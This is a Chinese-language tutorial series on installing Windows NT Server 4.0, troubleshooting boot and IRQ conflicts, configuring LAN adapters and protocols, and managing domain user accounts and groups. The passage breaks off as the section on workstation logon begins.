    1.启动计算机后，在DOS操作系统下改变当前目录至C:\NTS_TEMP，然后执行WINNT/B命令（表示从硬盘直接安装）。屏幕将显示源文件的路径（C:\NTS_TEMP），回车确认后，系统开始复制所需要的文件到硬盘的临时目录内（由系统自建）。复制完成后，按回车重新启动计算机，系统继续下一阶段的安装。如果你是在纯DOS7.0以上版本状态下安装NT，安装前要在C:的提示符下执行“LOCK C:”后再重新执行WINNT/B命令安装。如果是在Windows的DOS窗口中安装NT，就不用执行LOCK命令了。
    2.重新启动计算机后，屏幕将显示“Windows NT Server安装程序”的中文界面。这时，你可在屏幕信息的提示下，选择“开始安装Windows NT”选项。接着逐页阅读有关协议内容，直至阅读完毕后按F8键同意接受有关“Windows NT许可协议”。之后，安装程序自动检测当前计算机中已安装的硬件设备，经确认后系统安装对应的接口程序。
    3.屏幕显示硬盘的分区信息，同时提供下列信息选项：
    ○如果您要将Windows NT安装在突出显示的磁盘分区，或未分区的磁盘空间，请按ENTER。
    ○如果您想在未分区的磁盘空间上建立新的分区，请按C。
    ○如果您想删除突出显示的磁盘分区，请按D。
    一般情况下，用户在安装NTS4.0之前，已对硬盘进行了必要的分区，所以此时大家大可不必被屏幕上的这些提示信息所迷惑，只需用光标选择将系统文件安装在C盘或D盘即可。
    4.在选择了安装路径后，系统询问是否将原有的FAT文件格式转换为NTFS格式。到底你选择哪一种文件系统好呢？如果你的服务器是专用服务器，为了使系统具有较高的安全性，建议选择NTFS格式；如果你的服务器有时还要运行DOS、Windows95/98等系统，则必须使用FAT格式。不过当服务器安装结束后，FAT格式可以转换成NTFS格式，而NTFS格式却无法转换成FAT格式。（有关FAT与NTFS的特点和功能比较，请参考文章后面的小知识。)
    5.当计算机第二次重新启动后，你可以在安装向导的指引下，一步步地完成下列三方面的安装工作：○收集有关计算机的信息；○安装Windows NT网络；○完成安装
    首先进行第一阶段的安装。当选择了“收集有关计算机的信息”后，安装向导将提供以下四种安装类型:○典型安装(Typical);○便携式安装(Portable);○最小安装(Compact)；○定制安装(Custom)。其中，“典型安装”是最简便、最快速的安装方法，安装时系统将自动设置硬件的有关状态;“便携式安装”仅适用于便携式计算机的安装；“最小安装”方式适合于小容量硬盘的计算机；使用“定制安装”时，用户可以根据需要选择所要的安装组件。
    如果你是系统安装“老手”，请选择“定制安装”；如果你是个初学者，请最好选择“典型安装”，不过采用“典型安装”后，系统的网络功能要重新进行设置(这将在本讲第六部分讲到)。下面是选择了“定制安装”后主要的安装步骤：
    ①在输入了“计算机”名称和“组织”信息后，系统要求你输入“CD key”序列号。在确认序列号无误后，你可在下列两种许可协议中选择你需要的项目：○每服务器……；○每客户……。其中，“每服务器”方式适用于只有一个服务器的小型LAN;而“每客户”方式则用于多服务器的大型网络。我们选择“每服务器”方式，并输入需访问该服务器的用户数。
    ②在下列三种“服务器类型”中进行适合你的服务器身份的选择:○主域控制器(PDC);○备份域控制器（BDC）;○ 独立的服务器。如果你安装的是第一台域服务器，或你的网络中只有一个服务器时，请选择“主域控制器”;如果你所安装的域服务器是为了系统的安全需要，则选择“备份域控制器”，这样当主域控制器出故障后就可由备份域控制器接管主域控制器的工作，维持网络的正常运行；若你的网络不是设置成域的方式，而是设置成工作组（Workgroups），同时此台计算机也要成为工作组的成员时，应选择“独立的服务器”。我们现在的要求是建立小型LAN，所以选择“主域控制器”。
    ③输入Administrator管理员帐号的密码并确认。此密码一定要牢记，否则会带来许多麻烦。
    ④当系统询问“是否要制作紧急修复磁盘”时，请选择“是”这一选项。该紧急修复磁盘会在日后系统维护时发挥作用。
    ⑤选择需要安装的组件，如多媒体、游戏等。

    第二阶段是“安装Windows NT网络”，（这一过程在初安装时可忽略，但必须在安装结束后使用本文第六部分所讲的内容进行网络功能的设置）安装中的主要信息有：
    ①当系统询问是“以线路连接到网络”或是采用“远程访问网络”时，由于本讲座是建立LAN，因此，选择“用线路连接到网络”。同时，如果你使用的是ISDN连接方式时，也使用“用线路连接到网络”；当通过调制解调器连接网络时必须选择“远程访问网络”。当然，需要的话，两种连接方式可同时选择。
    ②询问是否要安装Internet信息服务器，如果你安装的服务器马上要接入Internet，就选择安装，否则可暂时不安装。
    ③在安装网络适配器(网卡)时，请选择“查找下一个”，此时安装系统将会自动找到你的机器中已安装的网卡，等你确认后系统便安装对应的驱动程序。如果系统在“查找下一个”时发生死机或测不到你的网卡，那么请你跳过此步的安装，等系统安装结束后再重新设置。
    ④在选择“网络协议”中，系统提供了以下三种可供安装的协议：○TCP/IP协议；○NWLink协议；○NetBEUI协议。
如果你要连接Internet或与Unix等非Microsoft的网络连接时，请选择TCP/IP协议；如果你所安装的服务器要与Netware网络连接，要选择NWLink协议；而NetBEUI协议非常适合于小型网络，它是我们建立NT网络时必选的一个协议。当然，你可以同时选择多个协议，且多选的协议不会影响系统的正常运行，但是，为了尽量节省系统的内存空间，请你仅选择适合你网络要求的协议部分。
    ⑤在“计算机名”后输入在网络上代表该服务器的名称，如：NTS01；在“域”名后面输入此网络的域名，如：C&C。
最后进行的一项是“完成安装”，可在屏幕信息的提示下进行。

四、测试你安装的NTS4.0服务器

    如果在安装NTS4.0时没有安装系统的网络功能，那么你可先阅读本文第六部分的内容。当NTS4.0服务器安装结束后，有必要对它进行系统的测试，看其是否能工作正常，一般可按如下步骤进行：
    1.启动NTS4.0服务器，提示按“Ctrl+Alt+Del”三个功能键进行登录（而不是DOS下的热启动），当输入“密码”后，若正常，将出现图1所示的操作界面，是否与Windows95相似？很亲切吧！
    2.选择“程序”项中的“管理工具（公用）”一项，如图2,用“事件查看器”检查安装中是否有错误发生。如图3所示，若哪一项上标有红色图示[stop]，表示该项有严重错误发生，须重新设置。
    3.若能够正常启动并成功地登录，再转入“网上邻居”查看是否可以浏览到该服务器（如果已有工作站与该服务器相连，也可查看是否能够浏览到工作站的用户名），如图4。若能浏览到，表示安装过程基本正常，否则需要重新安装或设置服务器的网络功能。
若系统无法启动或在以上的测试中存在没有通过的项目，可采取下列的方法进行解决。

五、系统故障排除

    如果事先做好各项工作，NTS4.0的安装是很简单的。不过几乎所有的初学者在第一次安装时，都不可能一次就成功，即使是安装成功了，也经常会出现一些系统故障。为此，下文将分类介绍NTS4.0服务器常见的故障和排除方法，这部分内容在平时的网络维护中也是非常重要的。
    1.开机启动时的故障及其排除
    如果你的计算机在开机后无法启动，在检查机器的CMOS设置正确、机器的其他硬件没有出错后，以下列出了常见的无法启动的显示信息以及相应的解决办法：
    ①显示出错信息:“BOOT:Couldn't find NTLDR ,Please insert another disk”
    出错原因和解决办法:该信息表示C:盘根目录下的隐含文件NTLDR丢失，并且C:盘的文件格式为FAT格式。位于根目录下的隐含文件NTLDR是NTS4.0开始启动时必须先装入的一个程序,为解决以上问题，必须恢复NTLDR文件。最简单的办法是用DOS启动后，将源安装盘下的NTLDR文件复制到C:盘根目录下，并重新启动计算机。建议用户备份NTLDR文件，防止类似错误的再次发生。
    ②显示出错信息:“A kernel file is missing from the disk,insert a system diskette and restart the system”
    出错原因和解决办法:该出错信息表示C:盘根目录下的隐含文件NTLDR丢失，且C:盘的文件格式为NTFS格式。解决的办法是使用安装NTS4.0时所制作的紧急修复磁盘，将修复磁盘插入A:驱动器，重新启动系统，按系统的提示自动完成对NTLDR文件的修复。
    ③当启动到屏幕由黑色变成蓝色时，出现“Inaccessible bott device”
    出错原因和解决办法:出错原因有两种可能，一种是C:盘的引导区感染了病毒，另一种可能是硬盘的类型（TYPE）设置不正确，例如在安装NTS4.0时选择的是LBA模式，但是安装结束后因故改为其他模式。解决的办法是：如果是引导区感染了病毒，则可使用杀毒软件对硬盘进行全面杀毒;如果是硬盘的类型设置不正确，请进入CMOS，将硬盘的类型还原到以前的与NTS4.0安装时相兼容的模式。
    ④笔者在写本文时，使用的一台安装样机在安装中第二次启动后，当出现“OS loader V4.00，如果你想……”时，不管按哪个键，在近一刻钟的时间内都没有反应。接着重新安装，故障依旧。后来发现机器上所有的可执行文件几乎都感染了病毒。杀毒后，安装一切正常。
    当然，在实际的安装和应用中出错信息还有很多，不过许多故障都可用紧急修复磁盘来解决，所以安装NTS4.0时，强烈要求大家一定要制作此磁盘。
    2.使用未被支持的设备
    在安装过程中，有些设备的确在机器中存在，但系统却无法检测到它;有些即使能够检测到，也无法安装对应的驱动程序。这时很有可能你使用了未被NTS4.0支持的设备，尤其是一些生产较早的网卡、声卡等。解决这一问题的办法是在选购网卡、声卡等设备时，一定要选支持NTS4.0的，而且设备附带相应的驱动程序。虽然NTS4.0自带了大量的设备驱动程序，但它毕竟不是“驱动程序大全”，而且现在同一计算机设备的品牌也是非常繁杂的。
    3.网卡的中断(IRQ)冲突和输入/输出(I/O)地址冲突的解决办法
    大多数人在Windows95下安装PCI或ISA类型的声卡或网卡时，基本不会发生中断冲突的问题，因为Windows95支持即插即用（PnP）的功能。但是NT不是一个支持即插即用的操作系统，同时它对可能发生的中断冲突或输入/输出地址的冲突非常敏感，这给许多板卡的使用和设置带来了不便，好象又回到了DOS时代。
    ①设置网卡中断。网卡是通过中断来通知CPU响应网络请求的，所以在服务器中,网卡必须有一个固定的中断值，且此中断值绝不能与其他设备的中断值相同，否则将发生中断冲突。PC机中总共支持16个IRQ，如表2，从表中可以看出，IRQ5、9、10、11、15都是可以被直接安全使用的。安装网卡时，IRQ5是最常用的中断值，建议其他设备一般不要使用此值。
    ②设置I/O地址。设置I/O地址时，唯一要注意的就是任何两种设备不要使用相同的I/O地址，以避免因为I/O地址冲突造成死机或运行不正常。I/O地址一般是三位数字，对网卡而言，典型的取值范围可从300H或310H开始。

IRQ的一般设置
RQ 用途 说明
0 定时器 已固定设计在主机板内，无法更改
1 键盘 已固定设计在主机板内，无法更改
2 利用其与第2个中断控 为了避免死机或系统无法正常运行，
制器（8259）串连 此值最好不要作为他用
3 COM2或COM4 第二或第四个串行接口（最好不用）
4 COM1或COM3 第一或第三个串行接口（最好不用）
5 LPT2 第二台打印机，因很少使用第二台
打印机，固IRQ5可被拿来使用
6 软盘控制器
7 LPT1 第一台打印机
8 实时时钟 已固定设计在主机板内，无法更改
9 未用 可直接使用
10 未用 可直接使用
11 未用 可直接使用
12 PS/2、Inport鼠标
13 数学协处理器 用于处理数学协处理器错误
14 硬盘控制器
15 未用 可直接使用

六、设置NTS4.0服务器的局域网功能

    NTS4.0服务器的网络功能一般在安装NTS4.0时就可完成。但是，如果你在安装NTS4.0时选择了“典型安装”或使用其他安装方式时没有安装系统的网络功能；或由于更换网卡，要求改变服务器的服务功能或协议等原因，都需要对服务器的网络功能进行重新的设置。有关网络功能的安装和设定，都在“控制面板”的“网络”选项内，以下将详细介绍其设置过程：
    1.安装网卡及其驱动程序
    ① 将网卡安装在计算机中相应的扩展槽中，并记下该网卡的中断值、I/O地址及扩展槽的位置等必备的参数；
    ②选择“我的电脑\控制面板\网络”，在出现的“网络”窗口中选择“适配器”选项，出现图5所示的窗口，选择此窗口中的“添加”按钮，又出现图6所示的“选定网络适配器”窗口。这时，你可以在“网络适配器”下方的列表中选择与你机器中所安装的网卡相同的类型，系统将自动安装对应的驱动程序。如果你一时无法确认机器中网卡的类型或从显示的类型中找不到与你的网卡对应的项目时，可选择“从磁盘安装”，出现图7所示的窗口,这时你只需在驱动器中插入网卡附带的驱动程序盘，并输入驱动程序所在的路径，系统将从软盘安装所需的驱动程序。
    ③随后，系统要求你输入网络的总线“类型”和“编号”，如图8。总线“类型”可根据网卡的不同选择ISA或PCI，“编号”处输入网卡在主机板上扩展槽的位置。
    ④最后，输入网卡的中断值、I/O地址，按“确定”按钮后系统开始复制相关程序。
    2.计算机名称的设定
    NT网络用域来实现对网络的管理，在域上计算机名是一个非常重要的信息。在同一域下，为了区分不同的计算机，每个计算机的名称必须唯一。
    选择“网络”窗口下的“标识”选项，可显示安装NTS4.0时已创建的“计算机名”和“域”名，如图9所示。当然，此时网络管理员可以对“计算机名”和“域”名进行修改，不过当网络安装好后，最好不要任意变更域名，以免影响网络上其他计算机登录该服务器。
    3.设置服务功能
    安装了NTS4.0服务器后，不仅作为域控制器来管理局域网中的所有计算机，同时还有其他许多功能和用途，将这些功能或用途称之为“服务”。譬如可作为DNS服务器、网络监视代理、远程访问服务等，这些服务在构建大型网络时是非常重要的。
    安装时可选择“网络”窗口下的“服务”功能项，出现图10所示的窗口，在窗口的“网络服务”下方列表中显示出已有的服务项目，如果还要添加其他的服务选项，可按“添加”按钮，在图11所示的“选定网络服务”窗口中可以进行其他服务功能的添加。
    4.设置网络通信协议
    通信协议在网络中起着连接计算机的桥梁作用，为此，我们可根据实际的通信需要，在网络中随时增减有关的通信协议。
在“网络”窗口下，选择“协议”项，显示图12所示的窗口，在此窗口中，显示了已有的有关协议，当然也可对已有的协议进行删除。按“添加”按钮后，在图13所示的“选定网络协议”窗口中可添加新的通信协议。当选择了某一协议后，按“确定”按钮，系统将自动复制相关的程序。
    以上所有设置，必须在重新启动NTS4.0服务器后才会生效。

返回


NT4.0组网技术系列讲座(三)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(三)

建立并管理用户帐号

    服务器是整个网络的核心，网络系统的安全与否和性能的优劣很大程度上取决于对服务器端的设定，本讲将利用整讲的篇幅详细介绍NTS4.0中用户帐号的建立和管理方法。在NTS4.0服务器上，“域用户管理器”和“管理向导”是用来建立和管理域中用户帐号信息的主要工具，本讲的重点也将集中到对“域用户管理器”功能的介绍上，而“管理向导”的使用方法将在文章最后作扼要概述。

一、 建立用户帐号前的准备工作

    一个有经验的网络管理员一定很注重对用户帐号的统一规划。就象银行对储户存款的管理一样，每个储户帐号都被分为定期、活期、定活两便等不同的类别，这样做的目的是方便对储户信息的管理。在网络中，每一个用户可能具有不同的职能，为了保证网上用户的相互识别和独立性，每一个用户都应有一个唯一的用户帐号，在这个用户帐号中包含有用户名称、登录密码以及登录方法等各项信息。但是，这些具有不同职能的用户，其使用网络资源的权限有些可能相同，有些可能不同，所以，我们利用“组”（即：用户组）来分类管理这些用户帐号，将具有相同资源权限的用户纳入同一个组来管理。正象每个用户有唯一的“用户帐号”一样，每个组也有唯一的“组帐号”。以后，只要给某一个组进行了权限设置，这个组下的所有用户就具有与组相同的属性，即可通过“组帐号”间接地给“用户帐号”赋予权限，这比对用户帐号逐一赋予权限要方便的多，同时避免了管理上的零乱。因此，当组建规模较大（用户数较多）的网络时，很有必要对需要登录服务器的用户帐号进行分类管理和规划。建议先制个表格，将用户根据其在网络中享有权限的不同来分类归档，然后运用组的功能，分块管理这些用户帐号。为便于后面的应用，表1中列出了建立和管理用户帐号中将要用到的一些名称及其说明。
    每个用户帐号中都包含着大量的用户信息，网络中所有用户帐号的信息都放在主域控制器中的SAM（安全访问管理器）文件中，此文件位于NTS4.0安装目录的\SYSTEM32\CONFIG子目录下，且无法用常用的编辑器修改或查看它的内容，建议在新建帐号或改变了用户帐号的有关属性后备份此文件。

二、新建用户帐号

    当成功创建一个用户帐号后，NTS会自动分配一个SID（Security Identifier，安全识别码）给该帐号。用户帐号的SID同时具有唯一性和永久性。即在同一网络中，SID不可能重复，即使用户帐号已被删除，其SID仍然会被永久保留。一个NT域中可同时容纳40亿个SID，所以尽可放心使用。以下将分步介绍用户帐号的建立过程。
    1.选择“开始/程序/管理工具(公用)/域用户管理器”，进入“域用户管理器”工作窗口，如图1。
    2.在图1中选择“用户”菜单下的“新用户”项，将出现图2所示的对话框。在该对话框中，你可以按照提示输入新建帐号的有关信息，包括用户名、全称（用户全名）、描述（用户的说明信息）以及密码等内容。其中：①用户名不能超过20个字节（10个汉字），而且不能包含"/\[]:;|=,+<>()等字符;②密码不超过14个字节，原则上密码可以使用任意字符，不过建议（要求）不使用汉字。而且在使用英文字母做密码时，应注意NT对密码的验证处理是大小写敏感的。这一点一定要注意，否则从工作站登录时，会出现密码不正确的提示；③如果选择了“用户下次登录时须更改密码”项，系统将会强迫用户在第一次登录时更改密码，否则无法登录。针对很多安全意识不强而使用缺省密码的用户，这是保证用户帐号安全的必要措施；④如果是创建供多人使用的公用帐号，应选择“用户不得更改密码”项，否则任何一个用户更改了密码后，都将造成其他用户无法使用该帐号登录;⑤当“密码永久有效”一项被选定后，不论是否在“帐号规则”（后面马上讲到）中已设置了密码使用期限，密码都永久有效；⑥如用户帐号暂时不使用，可选择“帐号暂时禁用”一项，以防止其他用户利用此帐号登录。
    3.在“新用户”对话框最下端，还有“组”、“配置文件”、“时数”、“登录到”、“帐号”、“拨入”六个功能按钮，可用来设置用户的其他特性，我们将在后面进行必要的描述。
    4.单击“添加”按钮，一个用户建立就成功了。重复上述步骤，可以继续建立其他的用户，当完成所有新用户的建立后，单击“关闭”按钮。

三、管理用户帐号

    1.限制用户登录的时间
    凭借新建成的帐号的缺省设置，用户可以在任何时间访问NT服务器。但在实际的应用中，有时需对用户访问网络服务器的时间进行限制。例如，许多公司为了禁止用户在下班后访问服务器，对用户帐号设置了登录时间限制。这样，在下班后，用户（当然更主要针对盗用别人帐号的非法用户）将无法登录，这有利于网络系统的安全管理。
    具体设置方法是，在图1所示的窗口中先选定一个或多个被设置的用户名，再选择“用户”菜单下的“属性”栏（当选定的是一个用户时也可双击此用户名），待出现 “用户属性”窗口后，点击窗口下方的“时数”按钮，将出现图3所示的“登录时数”对话框。对话框中填满的方格表示允许该用户使用的时间，该时间表示以小时为单位，一个方格代表一小时。蓝色表示允许登录，白色表示不允许登录。在缺省状况下，所有方块均为蓝色，即全天24小时都可登录到NT服务器。如要设置在某一时间段内不允许用户访问服务器时，只要用鼠标选中要限制的时段（按住鼠标左键，从起始时间格拖至结束时间格），再单击“禁止”按钮（此时所选时段应全部变为白色），即可限制该用户帐号在该时段内不能登录；若选择某时间段后，点击“允许”按钮，则该时间段允许用户登录。
    需要特别指出的是，用户帐号登录时数的改变要在该用户下次登录时才生效，并不能实时地终止已登录到NT服务器用户的网络联接。因此网络系统管理员应该在用户当日第一次登录之前，完成对其帐号登录时数的修改。

    2.限制用户的登录地点
    一个新用户建成后，系统默许他可以在任何一台工作站上登录，必要时你可以设置让其从指定的工作站登录。例如银行的柜台终端，由于其操作员位置绝对不允许移动，因此将其锁定到只能从特定终端登录就显得非常重要；而象部门主管之类的对数据库拥有较高权限、工作地点范围又相对固定的用户，可以将其登录地点分别设置到该部门主管所辖的电脑终端上，为各部门主管协同工作提供便利；而系统管理员(Administrator)由于其工作的特殊性，要求他必须能在任何时候、从任何位置对整个网络进行访问、管理，因此，限制系统管理员登录地点的设置是不明智的。
    用户登录地点的设置方法与设置用户登录时间的方法类似，只是在这里选择的是“用户属性”窗口中的“登录到”一项，此时出现图4所示的“登录工作站”对话框。请大家不要被对话框上方的两行选项信息所迷惑，从这两行提示信息的字面上看，是选择让用户登录到其他不同的工作站（LOGON TO），而不是从不同的工作站登录（LOGON FROM）。为什么会出现这样的信息呢？还是去问微软的程序员吧。为此笔者建议将这两行提示信息改写为“用户可从所有工作站登录”和“用户可从下列工作站登录”。当选择了用户从指定的工作站登录时，只要将代表该工作站的计算机名称输入即可（切记计算机名称前不能出现斜杠符“\”），最多可设置8个指定的工作站。
以上设置对运行Windows NT、Windows 98的工作站起作用，而DOS、Windows 3.X/95工作站不受以上设置的限制。

    3.设置用户帐号信息
    当点击“用户属性”窗口中的“帐号”后，将出现图5所示的“帐号信息”窗口，你可以在此窗口中对所选定的用户帐号进行有效期限和帐号类型等信息的设置。
    选取窗口中“帐号过期时间”下方的“永不过期”一项，表示该用户帐号可被无期限使用；选取 “有效期限”并输入了限定时间后，该帐号只在期限所规定的时间内有效，过了时间，该帐号就自动失效。帐号类型分为全局帐号与本地帐号两种。具有全局帐号属性的用户，可以在多域网络环境中享受到只使用一个密码即可在任意位置远程登录的便利，一般情况下应选“全局帐号”；本地帐号只作用于本地域，具有此属性的用户只能通过网络而不是以登录方式访问一个远程域，如要限制用户的交互登录能力，应选择该属性。

    4.复制用户帐号
    在建立一组用户帐号时，可能这些帐号的属性都相同，这时为了提高工作效率，可以使用复制用户帐号的功能。复制时必须先选定一个样本帐号，然后利用它复制新的帐号。其步骤如下：
    ①在图1所示的“域用户管理器”窗口中选择一个样本帐号，如WQ；
    ②选择“用户”菜单下的“复制”功能项，将出现图6所示的样本副本窗口，此窗口继承了样本帐号中除用户名、全称和密码之外的其他所有信息（请大家比较图2与图6中的有关信息项）；
    ③输入新的用户名、全称和密码，按“添加”后，新帐号复制完成。如果需要，还可用同样的方法继续复制其他的用户帐号。

    5.修改用户帐号
    在用户帐号的使用中，可根据不同时间或不同环境的需要，对帐号的属性进行必要的修改，NTS4.0允许你一次修改一个或多个用户帐号的属性。
    ①一次修改一个帐号的属性。在域用户管理器窗口中双击要修改帐号的用户名，执行类似新建用户帐号的操作，修改有关帐号的属性；
    ②同时修改多个帐号的属性。如多个帐号具有相同的属性，可一次性对其进行属性修改。具体方法是在“域用户管理器”窗口中，用鼠标拖选要修改的帐号（当被选帐号的位置不连续时，可按住Ctrl键不放，用鼠标单击多个帐号），再选择“用户”菜单下的“属性”选项，将出现图7所示的“用户属性”窗口，在此窗口中你可以象修改一个帐号一样对选定的多个帐号进行批量修改。

    6.用户帐号的更名与删除
    ①用户帐号的更名。就象你给自己换名字一样，用户帐号有时也需要进行更名。同一用户帐号更名后其属性和权限等设置不会发生变化，因为NT安全帐号数据库（SAM）中该用户的SID没有改变。操作时可以用“用户”菜单下的“重命名”命令对所选定的帐号进行更名，如图8所示。
    ②删除用户帐号。当某些帐号不再使用时，出于对系统安全的考虑，应及时将其从域中删除。操作中可利用“用户”菜单下的“删除”命令，对所选定的一个或多个帐号进行删除。一个用户帐号被删除后，如果再建立一个同名的帐号，该帐号不会继承前一个被删除帐号的属性和权限，这是因为NT会给不同时期建立的每一个帐号分配一个固定的SID。
请注意，Administrator和Guest两个内置的用户帐号是不允许被更名和删除的。

    7.用户帐号的安全设定
    网络中对用户帐号安全的管理是十分重要的，也是非常有必要的。在NT网络中系统管理员可以通过“域用户管理器”来管理用户的帐号规则、权限规则和审核规则：
    ①帐号规则的管理。帐号规则是指在用户帐号安全的前提下，给用户制定一些应遵循的规则，大致可分为密码限制和锁定限制两类。利用“域用户管理器”窗口中“规则”菜单下的“帐号”项进入图9所示的“帐号规则”对话窗口，此时可以设置域中所有用户帐号的特性，有关设置说明见表2。
    ②用户权限规则的管理。此处的权限两个字从严格的意义上讲应该是权力（Right），它是针对用户而言的，比如某用户帐号有从某台计算机上登录网络的权力，它适用于整个网络系统。而真正意义上的权限（Permission）是针对系统资源而言的，例如某用户具有访问某网络设备或目录的权限，它只针对网络上的某个对象（关于NT网络中权力和权限的理解及应用将在第五讲中详细介绍）。通过选择“域用户管理器”窗口中“规则”菜单下的“用户权限”，将出现图10所示的“用户权限规则”对话框。在此对话框中，可将一些系统所提供的权力分配给用户帐号或组，有关NT服务器所提供的权力说明请看表3。设置时可先从 “权限”列表中选择必要的权力，再按“添加”按钮。这时将出现图11所示的“添加用户及组”窗口，“名称”列表中选择被授权的用户帐号名或组名，然后单击“添加”按钮，被选择的用户名或组名将显示到窗口下方的“添加名称”列表中。这里一次只能选择一个用户名或组名，每选择一个“添加”一次，按“确定” 完成设置。若要解除已设置的用户帐号或组的权力，则从用户权限规则中选择该项权力，再到“授权”列表框中选中要解除该项权力的用户名或组名，单击“删除”按钮即可。
    ③ 用户帐号审核规则的管理。用户帐号的审核功能，主要用于登录时对所选定的事件进行审核，并将审核结果记录在安全日记中，需要时可通过事件查看器进行浏览。系统默认值是不进行审核，可通过选择“域用户管理器”窗口中“规则”菜单下的“审核”项，改变用户帐号的审核设置。在图12所示的审核规则窗口勾选需要审核的事件，即可启动该事件的审核功能。因为在一般网络中较少使用帐号审核规则，故在此不再详细介绍，只是为了讲述内容的完整性才将其提了出来。

四、 建立新的用户组并加入组成员

    NTS中的用户组是指具有相同网络权限的一组用户的集合。把网络中的用户帐号分成组来管理，一方面通过规范用户信息来减少系统管理员的管理难度，一方面也通过集中约束组用户的权限加强网络系统的安全性。
    在NTS服务器上，组又分为两类：全局组（Global Group）和本地组（Local Group）。许多缺乏经验的系统管理员在管理用户帐号时对这两个组的概念和作用感到迷惑不解，在此先对两个概念作必要的介绍：全局组是可访问整个网络的组，而本地组只能访问所在域上的信息。细心的系统管理员可以从域用户管理器的组窗口中看到两种不同的用户组图标，一种图标为两个头像加地球，而另一种是两个头像加计算机。这里，前者代表本地组，后者代表全局组，根据这两种图标可从一个方面形象地看到全局组和本地组的区别。在大型网络中全局组可以跨域访问，即在本地域中创建的全局组可以授权去访问同一网络中其他域上的资源；当一个网络中有多个域服务器时，本地组只能用在创建它的域中，而不能实现跨域访问。全局组与本地组之间存在着隶属关系，即全局组中不能包含本地组，而本地组中可以包含全局组，但本地组中不能包含自己域内的其他本地组。作为NTS操作系统安全机制的一部分，本地组与全局组是相辅相成的。全局组的存在拓宽了本地组的权力和权限，使本地用户可以访问其他域上的资源，而本地组的产生使得系统管理员可方便地管理本地域中的各项系统资源。
    在单服务器的NT网络中，全局组和本地组在实际的使用中没有太大的区别，我们既可以用全局组来管理用户帐号，也可以用本地组来管理用户帐号。不过，因为本地组中可以包含全局组中的用户，所以即使在单服务器的NT网络中，也可以同时建立两种不同类型的组，将一些重要的用户帐号分别纳入不同类型的组来管理，以达到对用户帐号的“双重化管理”。另外，读者应将这里所讲的全局组和本地组与前面讲过的全局帐号和本地帐号的作用区分开来。下面仅介绍本地组的建立方法（因全局组的建立过程与本地组基本相同，且还要简单，故本讲不再赘述）：
    ① 在“域用户管理器”窗口中打开“用户”菜单，单击“新本地组”功能项，将进入图13所示的“新本地组”对话框。在对话框的“组名”后面，输入新本地组的名称，在“描述”文字框中输入有关该本地组的介绍性内容。注意，新本地组的名称不能与域中其他用户名、组名及计算机名相同，同时组名的命名应遵循与用户名相同的规则；
    ②单击“添加”按钮，将出现图14所示的“添加用户及组”对话框。对话框上方的“列表名称来自”用于选择域名。在单服务器的网络中，其后只有一个域名（无选择余地），而在较大型的多服务器网络中，可能会列出多个域名。如果你要将其他域中的用户或组添加到该新建的组中，便要在此列表中选择对应的域名，之后在下方的“名称”列表框中将列出该域中的用户名和全局组名；
    ③在“名称”下方的列表中选定要添加至该组的用户名或全局组名后，单击“添加”按钮，则“添加名称”列表中就会显示相应的用户名或全局组名；
    ④这一步介绍怎样将全局组中的用户帐号添加到本地组中来。方法是在“名称”下方的列表中选定你要加入的一个全局组名后，单击“成员”按钮，将出现图15所示的“全局组”窗口，在此窗口中你可以选定你要加入的用户名，单击“添加”按钮后就可以把此用户添加到该本地组中。
    另外，当一个用户组不再有使用价值时，可将其从域中删掉。要删除一个失效的组，先选定要删除的组名，然后选择“用户”菜单下方的“删除”便可完成。不过请你放心，当一个组被删除以后，仅仅是把这个组从域中取消了，而组中的所有用户帐号和其他的组并不受影响。

五、使用“管理向导”建立用户帐号和组

    前面我们介绍了使用“域用户管理器”建立并管理用户帐号和组的方法，该方法适合于那些对整个操作系统较熟悉的系统管理员。而对一些“初级系统管理员”，NTS4.0提供了向导功能。这个管理向导将系统管理员在系统管理时可能要用到的功能（部分）加入到了向导程序，使用时只要依据向导的提示，便能完成一般的简单设置。
    具体的操作是选择“开始/程序/管理工具(公用)/管理向导”，以打开图16所示的“管理向导”窗口，在此窗口下你可以选择“添加用户帐号”项，将出现图17所示的“添加用户帐号向导”的对话框，你可根据向导的信息提示来添加新用户，并对其进行必要的属性设置；当选择了图16窗口中的“组管理”项后，将出现图18所示的“组管理向导”对话框，之后在向导的提示下，你可以创建一个新组或对现有的组进行修改。在使用“管理向导”时一般都有信息提示，它会简单地告诉你该做什么，而不该做什么，该怎样去做。相信在熟悉了“域用户管理器”的功能后，使用“管理向导”将不会存在问题，故在此对操作过程将不再详述。

返回


NT4.0组网技术系列讲座(四)

《一键清理系统垃圾》

NT4.0组网技术系列讲座(四)

从工作站登录NTS4.0服务器

    网络服务器安装设置好、并且为用户创建了帐号后，紧接着就要完成工作站网络组件的安装设置工作，使其能够登录服务器，共享网络资源。在局域网的组建中，这是一项繁杂的工作,因为视工作站的硬件配置不同，它们运行的操作系统可能也不一样。本讲将分别介绍从有盘（软、硬盘）的Windows 95/98/NT Workstation（NTW）、DOS/Windows 3.x和Windows for Workgroup（WFW） 3.11工作站登录NTS4.0服务器的方法。无盘NT工作站的安装和设置方法，将在稍后几期的《微型计算机》上另文作详细介绍。

一、 登录前应做的工作

    一个具有良好专业素质和丰富网络安装经验的系统管理员，应该注重整个网络建设中的每个环节。建议在连接工作站登录NT服务器前，应该认真考虑以下几个问题：

1.了解网络的布线结构
    许多对网络缺乏认识的用户和管理员总认为，只要将工作站连接到服务器，就实现了工作站的登录。他们往往忽视了不同的布线结构，对网络的稳定性和安全性起着决定性作用。在网络建设过程中，当我们发现工作站无法与服务器连接时，应该考虑从网络的布线结构出发，针对不同的结构分析故障原因，尽快排除故障。

2. 检查传输介质和连接设备
    首先要清楚网络中使用了哪些具体的传输介质（即网线），并确保它们的技术参数与规划的网络类型相匹配。不正确或不符合标准规范的网线类型、布设方法和接头制作，都会造成无法通信或通信不稳定的现象。而这种由网线引起的网络故障往往具有普遍性。另外，当网络中使用了集线器（HUB）或交换机（Switch）时，还应该熟悉这些连接设备的性能和连接方法。

3.网卡的驱动程序和诊断程序
    网卡，即网络适配器。安装网卡之前，应清楚它是否提供了工作站对应操作系统的驱动程序以及诊断程序。网卡是一个很容易引起硬件冲突的设备，良好的驱动程序是保证正常工作的首要条件，而诊断程序是诊断、排除硬件冲突最有力的工具。尤其是运用诊断程序往往会使排除物理连接故障的工作事半功倍，而事实上很多管理员忽视了它的存在。

4.选择合适的网络协议
